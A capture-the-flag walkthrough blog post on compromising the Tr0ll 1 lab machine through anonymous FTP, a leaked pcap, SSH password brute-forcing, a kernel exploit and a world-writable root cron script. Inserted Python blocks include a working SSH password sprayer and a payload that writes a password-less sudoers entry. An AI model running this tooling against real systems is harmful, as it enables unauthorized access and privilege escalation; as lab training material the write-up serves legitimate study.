Sunday, September 2, 2018

Tr0ll 1


TR0LL 1

- Layout for this exercise:




1 - INTRODUCTION

The goal of this exercise is the study of the hacking process for the vulnerable machine Tr0ll 1.


- According to the author's description, the goal is a Proof.txt file in the /root directory.

- Tr0ll 1 can be downloaded from here:


- Once downloaded and extracted with VMware:





2 - ENUMERATION

- Using netdiscover to find the IP corresponding to Tr0ll 1:







- Scanning with Nmap, there are 3 available services: port 21 (FTP), 22 (SSH) and 80 (HTTP):





2.1 - Web service

- Starting with the web service, we detect the presence of the folder /secret and the file robots.txt:




- Same information with nikto:





- Going directly to the website, there is nothing interesting:







- Similarly, nothing useful when checking robots.txt and /secret:










2.2 - FTP Service

- Scanning port 21 specifically, we discover that anonymous FTP login is allowed:



- Logging in as anonymous:




- There is a very promising file called lol.pcap:




3 - EXPLOITATION

- Getting the file lol.pcap:








- lol.pcap can also be downloaded with the browser over the FTP protocol:








- Opening lol.pcap with Wireshark:







- There is a packet mentioning a file called secret_stuff.txt:






- Following TCP stream 0:




- Following TCP stream 2:






- So, we learn that there is an additional web directory called sup3rs3cr3tdirlol.
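The "follow TCP stream" step above, as an added example that is not part of the original walkthrough: a small pure-Python pcap reader that reassembles each TCP conversation in both directions (the equivalent of Wireshark's tcp.stream index) and greps the result for a keyword. The pcap bytes are constructed inline by the helper functions to mimic an FTP control connection and a data connection; the payload text is invented for the example and only the directory name sup3rs3cr3tdirlol comes from the page. For a real capture, pass open('lol.pcap', 'rb').read() to tcp_streams() instead of SAMPLE_PCAP.

```python
"""Reassemble TCP stream payloads from a classic pcap file (added example)."""
import struct
from collections import defaultdict

LINKTYPE_ETHERNET = 1


def build_packet(src_ip, dst_ip, sport, dport, seq, payload):
    """Build an Ethernet/IPv4/TCP frame; checksums are left zero (not verified here)."""
    eth = b"\x00" * 12 + b"\x08\x00"                      # dst MAC, src MAC, ethertype IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0,  # data offset 5 words, flags PSH|ACK
                      5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap (magic 0xa1b2c3d4, version 2.4)."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(struct.pack("<IIII", 1_000_000 + i, 0, len(f), len(f)) + f
                       for i, f in enumerate(frames))
    return header + records


def tcp_streams(pcap_bytes):
    """Return {stream_index: {"c->s": bytes, "s->c": bytes}}.

    Streams are numbered in first-seen order like Wireshark's tcp.stream; the
    endpoint that sent the first segment is the client. Segments are concatenated
    in sequence-number order per direction (retransmissions are not deduplicated).
    """
    magic, = struct.unpack("<I", pcap_bytes[:4])
    if magic != 0xA1B2C3D4:
        raise ValueError("only little-endian classic pcap files are handled here")
    segments = defaultdict(list)   # endpoints -> [(seq, direction, payload)]
    origin = {}                    # endpoints -> (ip, port) that sent the first segment
    order = []                     # endpoints in first-seen order
    off = 24
    while off + 16 <= len(pcap_bytes):
        _, _, caplen, _ = struct.unpack("<IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                       # not IPv4
        ip = frame[14:]
        total_len, = struct.unpack("!H", ip[2:4])
        ip = ip[:total_len]                                # drop Ethernet padding
        if ip[9] != 6:
            continue                                       # not TCP
        ihl = (ip[0] & 0x0F) * 4
        src, dst = ip[12:16], ip[16:20]
        tcp = ip[ihl:]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if not payload:
            continue
        a, b = (src, sport), (dst, dport)
        key = frozenset((a, b))
        if key not in origin:
            origin[key] = a
            order.append(key)
        direction = "c->s" if a == origin[key] else "s->c"
        segments[key].append((seq, direction, payload))
    streams = {}
    for idx, key in enumerate(order):
        both = {"c->s": b"", "s->c": b""}
        for _, direction, payload in sorted(segments[key], key=lambda s: s[0]):
            both[direction] += payload
        streams[idx] = both
    return streams


def grep_streams(streams, needle):
    """Indices of the streams whose payload, in either direction, contains needle."""
    return [idx for idx, both in streams.items() if needle in both["c->s"] + both["s->c"]]


# Constructed sample capture: an FTP control channel and a separate data channel.
SAMPLE_PCAP = build_pcap([
    build_packet("10.0.0.5", "10.0.0.1", 40000, 21, 1, b"RETR secret_stuff.txt\r\n"),
    build_packet("10.0.0.1", "10.0.0.5", 21, 40000, 1, b"150 Opening data connection\r\n"),
    build_packet("10.0.0.1", "10.0.0.5", 20, 40001, 1,
                 b"you almost found the sup3rs3cr3tdirlol :-P\r\n"),   # invented text
])

if __name__ == "__main__":
    for idx, both in tcp_streams(SAMPLE_PCAP).items():
        print(f"--- tcp.stream eq {idx} ---")
        print((both["c->s"] + both["s->c"]).decode("latin-1"))
    print("hint in stream(s):", grep_streams(tcp_streams(SAMPLE_PCAP), b"sup3rs3cr3tdirlol"))
```

Keyword grep across reassembled streams is the quick way to find this kind of hint in a larger capture; for pcapng files or non-Ethernet link types, tshark -z follow,tcp,ascii,N does the same job.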

- Let's see if we can access it via the browser:



- It contains a file called roflmao; let's download it and see what we can learn about it.

- It seems to be a binary executable:













- At this point the file has no execute permission:




- Giving it execute permission:






- Running the file, we find more information (a reference to the address 0x0856BF):




- Trying /0x0856BF as a web directory, we discover 2 new folders:




- The folder good_luck contains a list of potential usernames:







- In the folder this_folder_contains_the_password there are 2 strings that could be the password: the filename Pass.txt and its content, Good_job:)





- Let's create a text file for potential usernames:



- Same thing for potential passwords:




- Launching Hydra against the SSH service with both wordlists:




- The result is successful for overflow:Pass.txt (so the password was the filename, not the file content).
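The wordlist-building and Hydra steps above, as an added example that is not part of the original walkthrough. The two listings are constructed stand-ins for what the 0x0856BF folders expose (a which_one_lol.txt with one name per line, some with trailing annotations, and a folder whose only file is Pass.txt containing Good_job:)); the point is that filenames as well as file contents must go into the password list, which is how Pass.txt ends up being tried. ssh_attempt() uses the third-party paramiko library and is only needed against a live target; spray() takes any attempt callback so the logic can be exercised offline.

```python
"""Build credential candidates from directory listings and spray them over SSH (added example)."""
import itertools

# Constructed stand-ins for the two downloaded folders (filename -> file content).
GOOD_LUCK = {
    "which_one_lol.txt": "maleus\nfelux\ngenphlux <-- Definitely not this one\noverflow\n",
}
PASSWORD_DIR = {"Pass.txt": "Good_job:)\n"}


def candidates_from_listing(files, include_names=True):
    """Deduplicated tokens from a listing: each filename (optionally) and each
    non-empty content line, with trailing '<-- ...' style annotations removed."""
    seen = []

    def add(token):
        token = token.strip()
        if token and token not in seen:
            seen.append(token)

    for name, content in files.items():
        if include_names:
            add(name)
        for line in content.splitlines():
            add(line.split("<")[0])
    return seen


def spray(users, passwords, attempt):
    """Try every user/password pair through attempt(user, pw) -> bool.
    Returns the first working (user, pw) or None."""
    for user, pw in itertools.product(users, passwords):
        if attempt(user, pw):
            return user, pw
    return None


def ssh_attempt(host, port=22, timeout=5):
    """Build an attempt() callback that really logs in with paramiko (live target only)."""
    import paramiko  # third-party: pip install paramiko

    def attempt(user, pw):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(host, port=port, username=user, password=pw, timeout=timeout,
                           allow_agent=False, look_for_keys=False)
            return True
        except paramiko.AuthenticationException:
            return False
        finally:
            client.close()
    return attempt


if __name__ == "__main__":
    # The listing filename itself is not a username, so names are excluded for users
    # but included for passwords (that is the whole trick of this box).
    users = candidates_from_listing(GOOD_LUCK, include_names=False)
    passwords = candidates_from_listing(PASSWORD_DIR)
    print("users:", users)
    print("passwords:", passwords)
    # Offline stand-in for the SSH server: only overflow:Pass.txt is accepted.
    fake = lambda u, p: (u, p) == ("overflow", "Pass.txt")
    print("hit:", spray(users, passwords, fake))
    # Against the real box: spray(users, passwords, ssh_attempt("<target-ip>"))
```

The equivalent Hydra invocation, once the two lists are written to files, is hydra -L users.txt -P passwords.txt ssh://<target>; the Python spray is here only to make the candidate-generation logic explicit.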





- Using overflow:Pass.txt as SSH credentials, we get a remote shell:








- However, this is a low-privilege shell, so we need privilege escalation to complete the attack:





4 - PRIVILEGE ESCALATION

- Let's try two alternative ways to perform privilege escalation:

4.1 - Exploiting the Operating System

- From the previous step we know that Tr0ll 1 is an Ubuntu 14.04 machine running kernel 3.13:




- Googling for an exploit for this kernel version:






- searchsploit helps us find a local privilege escalation exploit:







- The path to the exploit is:






- Locating 37292.c (the overlayfs local privilege escalation, CVE-2015-1328, for Ubuntu kernels 3.13 to 3.19):




- Starting a SimpleHTTPServer on port 8000 of the attacking Kali machine to serve the exploit:




- Back in the remote shell on Tr0ll 1, let's change to /tmp, which is usually world-writable:




- Downloading 37292.c from Kali:



- Compiling 37292.c:




- Running the compiled 37292, we finally get a root shell:




4.2 - Exploiting a crontab misconfiguration

- It is noticeable that every few minutes the SSH connection is closed by the remote host, which sends back a laughing message:





- At the same time the contents of /tmp are removed by the remote host:




- These two facts suggest that a cron job is at work here.

- However, when trying to read the crontab, permission is denied:







- Looking for files and directories writable by our user:






- Reading cronlog, we detect a script called cleaner.py that runs every 2 minutes via cron:




- Let's find it:





- Interestingly, cleaner.py is writable by everyone, even though cron executes it with full root privileges:




- Reading the content of cleaner.py, we now understand why Tr0ll 1 clears everything in /tmp every 2 minutes:







- Now the obvious idea: since root executes a script we can write, why not change its content to our own benefit? For instance, giving the user overflow sudo privileges to run a root shell.

- Let's check that at this moment the user overflow does not have any sudo privileges:



- Editing cleaner.py so that, on its next run as root, it grants the user overflow full sudo privileges:






- Once the cron period expires, Tr0ll 1 kicks us out of the SSH connection:



- Reconnecting again with SSH:




- Eventually, sudo as user overflow gives us a root shell:
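The writable-cron-script escalation above, as an added example that is not part of the original walkthrough (the page's own cleaner.py content is in the screenshots and is not reproduced here). audit_script() is the check that confirms the misconfiguration, a file that root runs from cron but that other users can modify; grant_sudo() is what one would put into cleaner.py so that the next scheduled run, executed as root, gives the user overflow password-less sudo through a drop-in in /etc/sudoers.d (Ubuntu's default /etc/sudoers includes that directory). The sudoers directory is a parameter, and demo() runs the whole scenario in a temporary directory so nothing on the real system is touched; the filename and 0440 mode rules are taken from sudoers(5).

```python
"""Audit a root cron job's script for write access, and the sudo-granting payload (added example)."""
import os
import stat
import tempfile


def audit_script(path):
    """Reasons why the file at path is unsafe to execute from root's crontab."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable (o+w)")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("group-writable by a non-root group")
    if st.st_uid != 0:
        reasons.append("not owned by root")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit (file can be replaced)")
    return reasons


SUDOERS_LINE = "{user} ALL=(ALL) NOPASSWD: ALL\n"


def grant_sudo(user, sudoers_dir="/etc/sudoers.d"):
    """Write a sudoers drop-in for user and return its path.

    Must run as root (that is what the cron job provides): sudo ignores files in
    sudoers.d that are not owned by uid 0, not mode 0440, or whose name contains
    a '.' or ends in '~'. The file is written to a temp name and renamed into place
    so sudo never sees a half-written file.
    """
    if not user or not all(c.isalnum() or c in "_-" for c in user):
        raise ValueError("user name must be a plain alphanumeric token (no '.')")
    target = os.path.join(sudoers_dir, user)
    fd, tmp = tempfile.mkstemp(dir=sudoers_dir)
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SUDOERS_LINE.format(user=user))
        os.chmod(tmp, 0o440)
        os.replace(tmp, target)
    except Exception:
        os.unlink(tmp)
        raise
    return target


def demo():
    """Run the scenario in a temp dir: a world-writable cleaner.py and a sudoers drop-in.
    Returns (reasons_before, reasons_after_chmod, dropin_name, dropin_text, dropin_mode)."""
    work = tempfile.mkdtemp(prefix="tr0ll-")
    script = os.path.join(work, "cleaner.py")
    with open(script, "w") as fh:   # constructed stand-in mimicking the box's cleaner script
        fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/*')\n")
    os.chmod(script, 0o777)                 # the misconfiguration: anyone can edit it
    before = audit_script(script)
    os.chmod(script, 0o755)                 # the fix: only the owner may write
    after = audit_script(script)
    dropin = grant_sudo("overflow", sudoers_dir=work)   # what the payload does as root
    with open(dropin) as fh:
        text = fh.read()
    mode = stat.S_IMODE(os.stat(dropin).st_mode)
    return before, after, os.path.basename(dropin), text, mode


if __name__ == "__main__":
    before, after, name, text, mode = demo()
    print("audit before fix:", before)
    print("audit after fix:", after)
    print(f"drop-in {name} (mode {mode:o}): {text.strip()}")
```

Appending the same line to /etc/sudoers directly, as the walkthrough does, works as well; the drop-in is used here because it is self-contained and easy to remove during cleanup. Because sudo refuses a sudoers file that is not owned by root, the file must be created by the cron run itself, not beforehand by overflow. After the next run, sudo -l shows the new rule and sudo -i gives the root shell.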



- Being root, we can look deeper into the crontab to understand what was happening on Tr0ll 1:













- Every 5 minutes the script lmao.py sends the teasing message and kills the session of the user overflow:






5 - CAPTURING THE FLAG

- Going to /root, we finally read the flag, proof.txt: